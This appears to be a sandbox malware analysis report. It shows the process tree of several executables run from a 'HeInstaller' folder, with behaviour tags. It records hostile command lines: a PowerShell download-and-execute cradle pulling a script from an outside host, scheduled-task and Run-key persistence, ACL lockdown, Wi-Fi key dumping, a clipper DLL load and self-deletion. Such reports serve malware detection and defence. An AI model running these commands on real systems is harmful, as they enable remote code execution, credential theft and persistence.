  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5320 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:2260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5564 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:3288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=960 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6036 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:3524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6056 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:3432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=3380 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:4340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=2384 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:4248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=3372 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:3972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=5328 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:1072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:1364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5004 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:3428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6612 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:4776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6780 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  - Modifies registry class
  PID:2276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6972 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:1340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=6868 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5876 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=2796 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=3276 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:3440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=5404 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:3248

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:1520

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2464
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data
  2⤵
  PID:4100

C:\Windows\System32\CredentialUIBroker.exe
"C:\Windows\System32\CredentialUIBroker.exe" NonAppContainerFailedMip -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3516

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a0 0x428
1⤵
PID:2120

C:\Windows\System32\CredentialUIBroker.exe
"C:\Windows\System32\CredentialUIBroker.exe" NonAppContainerFailedMip -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5100

C:\Windows\System32\CredentialUIBroker.exe
"C:\Windows\System32\CredentialUIBroker.exe" NonAppContainerFailedMip -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3872

C:\Windows\System32\CredentialUIBroker.exe
"C:\Windows\System32\CredentialUIBroker.exe" NonAppContainerFailedMip -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4768

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\New folder\HeInstaller\OringoClientSupporter.jar"
1⤵
PID:2368

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\New folder\HeInstaller\RMod+.jar"
1⤵
PID:1988

C:\Users\Admin\Desktop\New folder\HeInstaller\RFQ2.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\RFQ2.exe"
1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:224
- C:\Users\Admin\AppData\Local\Temp\Fvryllwsales.exe
  "C:\Users\Admin\AppData\Local\Temp\Fvryllwsales.exe"
  2⤵
  - Executes dropped EXE
  PID:1336
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  2⤵
  PID:988

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a0 0x428
1⤵
PID:4552

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (1).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (1).exe"
1⤵
PID:4024
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\icacls.exe
    "C:\Windows\System32\icacls.exe" "C:\ProgramData\sshDesktop-type0.8.0.3" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
    3⤵
    - Modifies file permissions
    PID:2060
- - C:\Windows\SysWOW64\icacls.exe
    "C:\Windows\System32\icacls.exe" "C:\ProgramData\sshDesktop-type0.8.0.3" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
    3⤵
    - Modifies file permissions
    PID:1892
- - C:\Windows\SysWOW64\icacls.exe
    "C:\Windows\System32\icacls.exe" "C:\ProgramData\sshDesktop-type0.8.0.3" /inheritance:e /deny "admin:(R,REA,RA,RD)"
    3⤵
    - Modifies file permissions
    PID:1540
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /CREATE /TN "sshDesktop-type0.8.0.3\sshDesktop-type0.8.0.3" /TR "C:\ProgramData\sshDesktop-type0.8.0.3\sshDesktop-type0.8.0.3.exe" /SC MINUTE
    3⤵
    - Creates scheduled task(s)
    PID:4128
- - C:\ProgramData\sshDesktop-type0.8.0.3\sshDesktop-type0.8.0.3.exe
    "C:\ProgramData\sshDesktop-type0.8.0.3\sshDesktop-type0.8.0.3.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5176
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 148
  2⤵
  - Program crash
  PID:1976

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2).exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1112
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap7751.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap7751.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:860
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xeyVI11.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xeyVI11.exe
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
    3⤵
    PID:4588
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y69TC67.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y69TC67.exe
  2⤵
  - Checks computer location settings
  PID:4968
- - C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
    "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
    3⤵
    - Checks computer location settings
    PID:2696
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:3872
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
      4⤵
      PID:5552
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:3864
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "legenda.exe" /P "Admin:N"
        5⤵
        
        PID:2916
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "legenda.exe" /P "Admin:R" /E
        5⤵
        
        PID:2192
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:6396
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\f22b669919" /P "Admin:N"
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\f22b669919" /P "Admin:R" /E
        5⤵
        Maps connected drives based on registry
        
        PID:4664
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
      4⤵
      Loads dropped DLL
      PID:6272
  - - C:\Users\Admin\AppData\Local\Temp\1000145001\ndt5tk.exe
      "C:\Users\Admin\AppData\Local\Temp\1000145001\ndt5tk.exe"
      4⤵
      Suspicious use of SetThreadContext
      PID:5228
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        
        PID:8032
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        6⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        7⤵
        
        PID:396
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        7⤵
        
        PID:4120
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile name="65001" key=clear | findstr Key
        6⤵
        
        PID:8116
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fds333333333333333.bat
        8⤵
        
        PID:7456
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 60
        9⤵
        Delays execution with timeout.exe
        
        PID:4484
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile name="65001" key=clear
        7⤵
        
        PID:6752
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr Key
        7⤵
        
        PID:7480
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5228 -s 556
        5⤵
        Program crash
        
        PID:2472

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap9196.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2384
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap9710.exe
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap9710.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1492
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz9517.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz9517.exe
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Executes dropped EXE
    - Windows security modification
    - Suspicious behavior: EnumeratesProcesses
    PID:4348
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v4630nF.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v4630nF.exe
    3⤵
    PID:4104
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 1020
      4⤵
      Program crash
      PID:5208
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w43kj59.exe
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w43kj59.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 1856
    3⤵
    - Program crash
    PID:2500

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2)2.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (2)2.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4496
- C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\zitV0071.exe
  C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\zitV0071.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1264
- - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\jr866572.exe
    C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\jr866572.exe
    3⤵
    PID:2112
- - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\ku834241.exe
    C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\ku834241.exe
    3⤵
    - Executes dropped EXE
    PID:1416
- C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\lr153091.exe
  C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\lr153091.exe
  2⤵
  PID:2368
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 508
  2⤵
  - Program crash
  PID:912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4024 -ip 4024
1⤵
PID:4340

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:1960
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2928
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -h
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1208
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\brg.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\brg.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:3852
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
    3⤵
    PID:3524
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
    3⤵
    PID:2860
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
    3⤵
    PID:3260
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
    3⤵
    PID:1384
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:952
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')"
    3⤵
    PID:2792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      PID:1404
- - C:\ProgramData\3182.tmp.exe
    "C:\ProgramData\3182.tmp.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    PID:3568
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe" >> NUL
    3⤵
    PID:4856
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:4312
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffAppE2.exe"
  2⤵
  - Executes dropped EXE
  PID:1472
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe"
  2⤵
  PID:2824
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 452
    3⤵
    - Program crash
    PID:5448
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 764
    3⤵
    - Program crash
    PID:5852
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 772
    3⤵
    - Program crash
    PID:5144
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 764
    3⤵
    - Program crash
    PID:5648
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 796
    3⤵
    - Program crash
    PID:1480
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 984
    3⤵
    - Program crash
    PID:320
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1004
    3⤵
    - Program crash
    PID:548
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1140
    3⤵
    - Program crash
    PID:5656
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1396
    3⤵
    - Program crash
    PID:4352
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "lower.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\RarSFX0\lower.exe" & exit
    3⤵
    PID:924
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "lower.exe" /f
      4⤵
      Kills process with taskkill
      PID:4956
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1344
    3⤵
    - Program crash
    PID:1892
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss29.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss29.exe"
  2⤵
  PID:2548

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (4).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (4).exe"
1⤵
PID:2948
- C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\kino6747.exe
  C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\kino6747.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:412
- - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\kino5308.exe
    C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\kino5308.exe
    3⤵
    PID:4940
  - - C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\kino5694.exe
      C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\kino5694.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:380
    - - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\bus6396.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\bus6396.exe
        5⤵
        
        PID:4804
    - - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\cor7640.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\cor7640.exe
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Executes dropped EXE
        Windows security modification
        
        PID:2184
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 1076
        6⤵
        Program crash
        
        PID:5740
  - - C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\dsq85s03.exe
      C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\dsq85s03.exe
      4⤵
      PID:4808
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 2356
        5⤵
        Program crash
        
        PID:3272
- - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\en777685.exe
    C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\en777685.exe
    3⤵
    PID:4044
- C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\ge386417.exe
  C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\ge386417.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:4808
- - C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
    "C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe"
    3⤵
    - Checks computer location settings
    PID:3276

C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4268
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3404

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:3668
- C:\Windows\SysWOW64\rundll32.exe
